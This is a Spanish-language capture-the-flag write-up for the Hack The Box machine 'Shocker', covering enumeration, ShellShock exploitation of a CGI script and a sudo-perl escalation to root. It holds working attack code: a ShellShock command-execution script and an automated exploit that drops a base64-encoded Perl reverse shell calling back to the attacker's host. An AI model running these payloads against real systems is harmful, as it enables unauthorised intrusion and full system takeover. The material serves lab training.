Shocker
Difficulty : Easy
Operating System : Linux
Rating : 4.7
Author : mrb3n
Description
Para comprometer esta maquina abusaremos de una vulnerabilidad ampliamente conocida en la etapa "user own", posteriormente aprovecharemos una mala configuracion en sudo para escalar hacia el usuario root
Enumeration
Para la enumeracion basica vamos a utilizar una tool que he desarrollado especificamente para trabajar con maquinas en la plataforma hackthebox. Esta herramienta crea la carpeta de trabajo, realiza un escaneo basico con nmap y si encuentra un servicio web le lanza una enumeracion basica.
Descarga: HTBenum
Nmap
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Whatweb
http://shocker.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.56]
HTTP Headers
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 11:54:12 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 22 Sep 2017 20:01:19 GMT
ETag: "89-559ccac257884"
Accept-Ranges: bytes
Content-Length: 137
Vary: Accept-Encoding
Content-Type: text/html
ffuz
[root@htb shocker]# ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://shocker.htb/FUZZ/
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://shocker.htb/FUZZ/
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
cgi-bin [Status: 403, Size: 294, Words: 22, Lines: 12]
icons [Status: 403, Size: 292, Words: 22, Lines: 12]
server-status [Status: 403, Size: 300, Words: 22, Lines: 12]
:: Progress: [220545/220545] :: Job [1/1] :: 569 req/sec :: Duration: [0:06:31] :: Errors: 0 ::
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.56
+ Target Hostname: shocker.htb
+ Target Port: 80
+ Start Time: 2021-09-28 14:43:01 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8777 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2021-09-28 14:52:09 (GMT2) (548 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
User Own
En la fase de reconocimiento hemos descubierto un directorio llamado "cgi-bin", por esto y con la pista del nombre de la maquina puedo intuir que nos enfretamos a la vulnerabilidad ShellShock. Con esto en mente y puesto que el directorio no lista los archivos que contiene, voy a volver a lanzar ffuf buscando las extensiones ".sh" y ".cgi"
ffuz
[root@htb shocker]# ffuf -e '.sh','.cgi' -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://shocker.htb/cgi-bin/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://shocker.htb/cgi-bin/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .sh .cgi
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
user.sh [Status: 200, Size: 119, Words: 19, Lines: 8]
Parece que hay un script escrito en bash que simplemente muestra un uptime de la maquina
[root@htb shocker]# curl -s http://shocker.htb/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
10:24:21 up 22 min, 0 users, load average: 0.00, 0.00, 0.00
Ahora comprobemos si es vulnerable a ShellShock
[root@htb shocker]# curl -H "User-agent: () { :;}; echo; echo vulnerable" http://shocker.htb/cgi-bin/user.sh
vulnerable
Content-Type: text/plain
Just an uptime test script
10:30:34 up 28 min, 0 users, load average: 0.00, 0.00, 0.00
A continuacion vamos a crear un pequeño exploit para manejarnos por el sistema operativo y enviarnos una reverse shell si es necesario
xpl.sh
#!/usr/bin/env bash
TARGET="http://shocker.htb/cgi-bin/user.sh"
COMMAND="$1"
curl -H "User-agent: () { :;}; echo; echo; /bin/bash -c '${COMMAND}'" ${TARGET}
[root@htb shocker]# ./xpl.sh "ls -alR /home"
/home:
total 12
drwxr-xr-x 3 root root 4096 Sep 22 2017 .
drwxr-xr-x 23 root root 4096 Sep 22 2017 ..
drwxr-xr-x 4 shelly shelly 4096 Sep 22 2017 shelly
/home/shelly:
total 36
drwxr-xr-x 4 shelly shelly 4096 Sep 22 2017 .
drwxr-xr-x 3 root root 4096 Sep 22 2017 ..
-rw------- 1 root root 0 Sep 25 2017 .bash_history
-rw-r--r-- 1 shelly shelly 220 Sep 22 2017 .bash_logout
-rw-r--r-- 1 shelly shelly 3771 Sep 22 2017 .bashrc
drwx------ 2 shelly shelly 4096 Sep 22 2017 .cache
drwxrwxr-x 2 shelly shelly 4096 Sep 22 2017 .nano
-rw-r--r-- 1 shelly shelly 655 Sep 22 2017 .profile
-rw-r--r-- 1 root root 66 Sep 22 2017 .selected_editor
-rw-r--r-- 1 shelly shelly 0 Sep 22 2017 .sudo_as_admin_successful
-r--r--r-- 1 root root 33 Sep 29 10:02 user.txt
/home/shelly/.cache:
total 8
drwx------ 2 shelly shelly 4096 Sep 22 2017 .
drwxr-xr-x 4 shelly shelly 4096 Sep 22 2017 ..
-rw-r--r-- 1 shelly shelly 0 Sep 22 2017 motd.legal-displayed
/home/shelly/.nano:
total 8
drwxrwxr-x 2 shelly shelly 4096 Sep 22 2017 .
drwxr-xr-x 4 shelly shelly 4096 Sep 22 2017 ..
Root Own
Una vez hemos conseguido acceso al sistema y tras una enumeracion basica, podemos ver una mala configuracion en sudoers
shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Podemos aprovechar que tenemos permisos en perl para lanzar una shell como root. Un recurso basico a visitar para malas configuraciones en binarios es GTFOBins
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)
ls /root
root.txt
EXTRA : Como es una maquina extra sencilla, he montado un pequeño script en bash que juega con screen y automatiza toda la explotacion sacando las flags
autoexploit.sh
#!/usr/bin/env bash
# shocker htb automate exploit
SESSION=$(tr -dc '0-9' < /dev/urandom | fold -w 5 | head -n 1)
RSHELL="dXNlIFNvY2tldDsKdXNlIFBPU0lYIHF3KHNldHNpZCk7CgojJFNJR3snSU5UJ309J0lHTk9SRSc7CiMkU0lHeydURVJNJ309J0lHTk9SRSc7CiMkU0lHeydIVVAnfT0nSUdOT1JFJzsKIyRTSUd7J0tJTEwnfT0nSUdOT1JFJzsKIyRTSUd7J0NITEQnfT0nSUdOT1JFJzsgI2lmKGZvcmsoKSl7ZXhpdCgwKTt9OwoKZGllICgiaXAgYW5kIHBvcnQgbmVlZGVkIikgaWYgKCQjQVJHViAhPSAxICYmICQjQVJHViAhPSAyKTsKCm15ICRob3N0ID0gJEFSR1ZbMF07Cm15ICRwb3J0ID0gJEFSR1ZbMV07Cm15ICR0aW1lb3V0ID0gMjA7Cm15ICRidWZmZXIsICRyZXF1ZXN0PSIiLCAkZXg7Cm15ICRwcm9jbmFtZSA9ICIvdXNyL3NiaW4vaHR0cGQiOwoKCiRwcm9jbmFtZSA9ICRBUkdWWzJdIGlmICgkI0FSR1YgPT0gMik7CgoKCQogICAJZGVsZXRlICRFTlZ7J0hJU1RGSUxFJ307CglkZWxldGUgJEVOVnsnSElTVEZJTEVTSVpFJ307CglkZWxldGUgJEVOVnsnSElTVFNJWkUnfTsKCiAgIAlpZihmb3JrKCk+MCl7CgkJc2V0c2lkOwoJCXNvY2tldCAoU09DSyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJzb2NrZXQgJCEiOwoJCSgkbmFtZSwkYWxpYXNlcywkdHlwZSwkbGVuLCRyZW1vdGVfYWRkcikgPSBnZXRob3N0YnluYW1lKCRob3N0KTsKCQkkc29ja2FkZD1wYWNrKCdTIG4gYTQgeDgnLDIsJHBvcnQsJHJlbW90ZV9hZGRyKTsKCQljb25uZWN0IChTT0NLLCAkc29ja2FkZCkgfHwgZGllICJjb25uZWN0OiAkISI7CgoJCW9wZW4oU1RESU4sIj4mU09DSyIpO29wZW4oU1RET1VULCI8JlNPQ0siKTtvcGVuKFNUREVSUiwiPCZTT0NLIik7CiAgIAkJZXhlYyB7Jy9iaW4vYmFzaCd9ICRwcm9jbmFtZTsKICAgCX0KCSNraWxsICgkJCw5KTsKCg=="
screen -S ${SESSION} -dm bash -c "nc -lvvp 7788"
timeout 0.5 curl -H "User-agent: () { :;}; echo; echo; /bin/bash -c 'echo ${RSHELL} | base64 -d -w 0 > /tmp/rshell.pl'" http://shocker.htb/cgi-bin/user.sh
timeout 0.5 curl -H "User-agent: () { :;}; echo; echo; /bin/bash -c 'perl /tmp/rshell.pl 10.10.14.9 7788'" http://shocker.htb/cgi-bin/user.sh
screen -S ${SESSION} -X stuff "/bin/rm /tmp/rshell.pl"`echo -ne '\015'`
#user flag
screen -S ${SESSION} -X stuff "id"`echo -ne '\015'`
screen -S ${SESSION} -X stuff "cat /home/shelly/user.txt"`echo -ne '\015'`
#root flag
screen -S ${SESSION} -X stuff "sudo /usr/bin/perl -e 'exec \"/bin/sh\";'"`echo -ne '\015'`
screen -S ${SESSION} -X stuff "id"`echo -ne '\015'`
screen -S ${SESSION} -X stuff "cat /root/root.txt"`echo -ne '\015'`
#go to target
screen -r ${SESSION}
[root@htb shocker]# ./autoexploit.sh
listening on [any] 7788 ...
connect to [10.10.14.9] from shocker.htb [10.10.10.56] 53410
/bin/rm /tmp/rshell.pl
id
cat /home/shelly/user.txt
sudo /usr/bin/perl -e 'exec "/bin/sh";'
id
cat /root/root.txt
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
c1b46d3ccXXX395bfc0d33e3a61177cb
uid=0(root) gid=0(root) groups=0(root)
18e8d330ae3XXXecac4792348dbc8d7e